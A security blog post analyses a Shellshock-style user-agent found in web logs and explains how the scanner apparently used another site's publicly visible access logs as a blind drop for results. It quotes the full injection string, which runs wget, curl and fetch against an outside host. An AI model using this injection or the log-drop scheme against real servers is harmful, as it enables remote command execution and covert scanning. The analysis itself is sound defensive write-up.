Indirect shellshock security scanning via other people's logfiles

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST 
Resolving closettransfer.com (closettransfer.com)... 98.138.19.143
Connecting to closettransfer.com (closettransfer.com)|98.138.19.143|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2016-04-30 13:38:26 ERROR 404: Not Found.
They weren't sending a malicious payload - and the scanning had sent the results to /dev/null anyway.  Googling IPTRANSITTEST turned up a few hits in other people's logfiles... wait a second.  Logfiles.  What if closettransfer.com had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?

My first guess proved startlingly lucky:
Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn't dig further.

It's pretty clear, though, what happened:  These logfiles are easily found via a bit of "Google-scanning":
Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent.  By using the drop-box, these nodes never need to contact the controller / response collector:  they're completely fire-and-forget, and thus, could be distributed as malware or in a host of other ways.  At some point, the controller wants to get the entries.  He/she then can just download the raw access files using Tor, finding all sorts of juicy entries like:
XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" "closettransfer.com"

Clever.

Comments

Post a Comment

Popular posts from this blog

Reflecting on CS Graduate Admissions

I was just indulging in my favorite bad habit (reading hacker news), when I came across a discussion about  prestige in faculty hiring  - namely, the fact that the majority of CS professors across the US come from the top 18 or so universities, and that even within that, there's bias.  The HN discussion turned to Ph.D. admissions, with a commenter noting: " I'm not sure, but I'd bet that the best institutions actually don't care where their applicants come from. They can afford to just choose the best. It's the so-so places that have to signal their quality by 'hiring the best'. I've seen this in graduate school applications - students with poor marks often stand a better chance of admittance in a top program than a so-so one. " I just finished chairing the CMU CS Ph.D. admissions committee, so I thought it might be worth writing down my experience in doing so.  With two very important notes: I'm not doing it next year, so please don
Read more

Chili Crisp Showdown: Laoganma and Flybyjing

Image
I've been on a bit of a chili crisp mission lately.  The Internets -- and my friends -- appear convinced that the best chili crisp is Laoganma .  Or Flybyjing .  Certainly one of them.  But which? My answer, alas, is that you might want a bottle of each.  Or five bottles of each.  Let's jump in: Laoganma on the left, Flybyjing on the right.  The famous slightly disapproving face of the old grandmother stares at us, contrasted with the apparently very-hard-to-print rainbow label of the newer entrant.  Opening up the containers, one is immediately struck by the color and texture differences: Laoganma, on the left in both photos, has more "crunchy bits", but also has fewer suspended solids in the oil.  The bottle is about 3/4 full of the solid crispy bits.  The flybyjing bottle is only about 1/3 full of crispy bits. This difference flows through to the spoonfuls below -- much more crispy stuff in the laoganma, but its oil is merely the color of chili o
Read more

Two examples from the computer science review and publication process

  A few days ago, I posted about getting the Ph.D. in computer science .  As part of that post, I mentioned that I'd publish & discuss some of the reviews my papers have received.  These aren't so nasty that they're funny, but I decided to post the full submission/review/submission/review/final as a way to also help show what the publication and revision process looks like.  I probably owe a better explanation of the delta between the papers, but - hey, the SIGCOMM, USENIX ATC, and SEA (algorithms) deadlines are all this week. :) I've deliberately picked two papers with very different initial reviews.  Both were eventually accepted, and neither was accepted upon first submission.  One received a best paper award.  Both have over 100 citations.  I've picked these not because they're representative -- I've written papers with low citation counts also -- but because they illustrate the wide disparity in review constructiveness and tone that even decent, p
Read more